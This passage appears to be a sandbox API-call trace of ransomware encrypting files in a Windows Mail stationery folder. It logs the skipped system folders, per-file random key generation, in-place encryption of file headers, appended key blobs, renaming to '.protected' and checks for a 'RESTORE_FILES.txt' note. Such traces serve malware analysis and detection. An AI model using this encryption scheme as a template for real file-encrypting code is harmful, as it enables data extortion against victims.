(in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0094.623] StrStrIW (lpFirst="Shades of Blue.htm", lpSrch=".protected") returned 0x0 [0094.623] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="RESTORE_FILES.txt") returned 1 [0094.623] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.623] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.623] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0094.623] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".txt") returned 0x0 [0094.623] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0094.623] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".rar") returned 0x0 [0094.623] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0094.623] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".zip") returned 0x0 [0094.623] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.624] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.624] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.624] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.624] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.625] 
WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.625] CloseHandle (hObject=0x150) returned 1 [0094.625] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.protected") returned 97 [0094.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.protected")) returned 1 [0094.625] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.625] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Windows") returned -1 [0094.625] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Program Files") returned 1 [0094.626] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Program Files (x86)") returned 1 [0094.626] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="$Recycle.bin") returned 1 [0094.626] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="System Volume Information") returned -1 [0094.626] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0094.626] StrStrIW (lpFirst="ShadesOfBlue.jpg", lpSrch=".protected") returned 0x0 [0094.626] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0094.626] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.626] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.626] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0094.626] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".txt") returned 0x0 [0094.626] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0094.626] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".rar") returned 0x0 [0094.626] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0094.626] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".zip") returned 0x0 [0094.626] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x127e, lpOverlapped=0x0) returned 1 [0094.633] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffed82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.633] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x127e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x127e, lpOverlapped=0x0) returned 1 [0094.633] SetFilePointerEx (in: 
hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.633] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.633] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.633] CloseHandle (hObject=0x150) returned 1 [0094.634] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.protected") returned 95 [0094.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.protected")) returned 1 [0094.634] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.634] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Windows") returned -1 [0094.635] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Program Files") returned 1 [0094.635] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Program Files (x86)") returned 1 [0094.635] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="$Recycle.bin") returned 1 [0094.635] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="System Volume Information") returned -1 [0094.635] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0094.635] StrStrIW (lpFirst="Soft Blue.htm", lpSrch=".protected") returned 0x0 [0094.635] lstrcmpW (lpString1="Soft Blue.htm", lpString2="RESTORE_FILES.txt") returned 1 [0094.635] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.635] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.635] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0094.635] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".txt") returned 0x0 [0094.635] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0094.635] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".rar") returned 0x0 [0094.636] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0094.636] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".zip") returned 0x0 [0094.636] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0094.636] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0094.637] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0094.637] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.637] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.637] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.637] CloseHandle (hObject=0x150) returned 1 [0094.637] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.protected") returned 92 [0094.637] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.protected")) returned 1 [0094.638] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Windows") returned -1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Program Files") returned 1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Program Files (x86)") 
returned 1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="$Recycle.bin") returned 1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="System Volume Information") returned -1 [0094.638] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0094.638] StrStrIW (lpFirst="SoftBlue.jpg", lpSrch=".protected") returned 0x0 [0094.639] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0094.639] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.639] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.639] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0094.639] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".txt") returned 0x0 [0094.639] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0094.639] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".rar") returned 0x0 [0094.639] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0094.639] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".zip") returned 0x0 [0094.639] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0094.642] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.642] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0094.642] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.642] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.642] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.643] CloseHandle (hObject=0x150) returned 1 [0094.643] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.protected") returned 91 [0094.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.protected")) returned 1 [0094.644] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="Windows") returned -1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="Program Files") returned 1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="Program Files (x86)") returned 1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="$Recycle.bin") returned 1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="System Volume Information") returned -1 [0094.644] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0094.644] StrStrIW (lpFirst="Stars.htm", lpSrch=".protected") returned 0x0 [0094.644] lstrcmpW (lpString1="Stars.htm", lpString2="RESTORE_FILES.txt") returned 1 [0094.644] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.644] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.645] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0094.645] StrStrW (lpFirst="Stars.htm", lpSrch=".txt") returned 0x0 [0094.645] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0094.645] StrStrW (lpFirst="Stars.htm", lpSrch=".rar") returned 0x0 [0094.645] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0094.645] StrStrW (lpFirst="Stars.htm", lpSrch=".zip") returned 0x0 [0094.645] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe6, lpOverlapped=0x0) returned 1 [0094.646] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.646] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe6, lpOverlapped=0x0) returned 1 [0094.646] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.646] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.646] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.646] CloseHandle (hObject=0x150) returned 1 [0094.646] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.protected") returned 88 [0094.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\Stars.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.protected")) returned 1 [0094.647] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="Windows") returned -1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="Program Files") returned 1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="Program Files (x86)") returned 1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="$Recycle.bin") returned 1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="System Volume Information") returned -1 [0094.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0094.648] StrStrIW (lpFirst="Stars.jpg", lpSrch=".protected") returned 0x0 [0094.648] lstrcmpW (lpString1="Stars.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0094.648] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.648] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.649] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0094.649] StrStrW (lpFirst="Stars.jpg", lpSrch=".txt") returned 0x0 [0094.649] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0094.649] StrStrW (lpFirst="Stars.jpg", lpSrch=".rar") returned 0x0 [0094.649] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0094.649] StrStrW (lpFirst="Stars.jpg", lpSrch=".zip") returned 0x0 [0094.649] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x1d51, lpOverlapped=0x0) returned 1 [0094.651] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe2af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.651] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x1d51, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x1d51, lpOverlapped=0x0) returned 1 [0094.651] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.651] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.651] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.651] CloseHandle (hObject=0x150) returned 1 [0094.651] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.protected") returned 88 [0094.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
